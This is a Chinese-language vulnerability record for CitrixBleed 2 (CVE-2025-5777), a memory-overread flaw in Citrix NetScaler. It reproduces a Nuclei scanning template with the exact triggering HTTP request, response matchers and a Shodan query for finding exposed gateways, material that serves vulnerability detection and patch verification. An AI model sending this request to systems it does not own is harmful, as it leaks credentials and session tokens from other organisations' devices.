漏洞信息
漏洞名称: Citrix NetScaler Memory Disclosure - CitrixBleed 2
漏洞编号:
漏洞类型: 信息泄露
漏洞等级: 严重
漏洞描述: Citrix NetScaler是一款广泛使用的应用交付控制器和网关设备,为企业提供负载均衡、SSL加速和安全的远程访问等功能。由于其广泛部署于企业网络边界,NetScaler的安全问题可能对企业的网络安全构成严重威胁。CVE-2025-5777,也被称为CitrixBleed 2,是一个严重的内存泄露漏洞,影响NetScaler管理接口。该漏洞源于对输入验证不足,导致攻击者可以通过构造特定的请求,触发内存越界读取,从而泄露敏感信息。这种漏洞可能被利用来获取系统内存中的敏感数据,如用户凭证、会话令牌等,进一步可能导致未授权访问或其他恶意活动。由于漏洞存在于NetScaler的管理接口,攻击者可能无需认证即可利用此漏洞,增加了其潜在的危险性。企业应立即评估其NetScaler设备的安全性,并应用相关补丁以防止潜在的攻击。
产品厂商: Citrix
产品名称: NetScaler ADC, NetScaler Gateway
搜索语法: title:”NetScaler Gateway”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/4815a962b8a9d6040dfc818d4139515530b01835/http%2Fcves%2F2025%2FCVE-2025-5777.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56
| id: CVE-2025-5777
info: name: Citrix NetScaler Memory Disclosure - CitrixBleed 2 author: watchtowr,DhiyaneshDk severity: critical description: | Insufficient input validation leading to memory overread on the NetScaler Management Interface NetScaler ADC and NetScaler Gateway reference: - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420 - https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/ - https://nvd.nist.gov/vuln/detail/CVE-2025-5777 classification: epss-score: 0.00042 epss-percentile: 0.12361 metadata: verified: true max-request: 1 shodan-query: title:"NetScaler Gateway" tags: cve,cve2025,netscaler,citrix,exposure
http: - raw: - |+ POST /p/u/doAuthentication.do HTTP/1.0 Host: {{Hostname}} User-Agent: watchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowr
login
unsafe: true
matchers-condition: and matchers: - type: word part: body words: - "No active policy during authentication" negative: true
- type: word part: body words: - "<InitialValue></InitialValue>"
- type: word part: content_type words: - "application/vnd.citrix.authenticateresponse"
- type: status status: - 200
|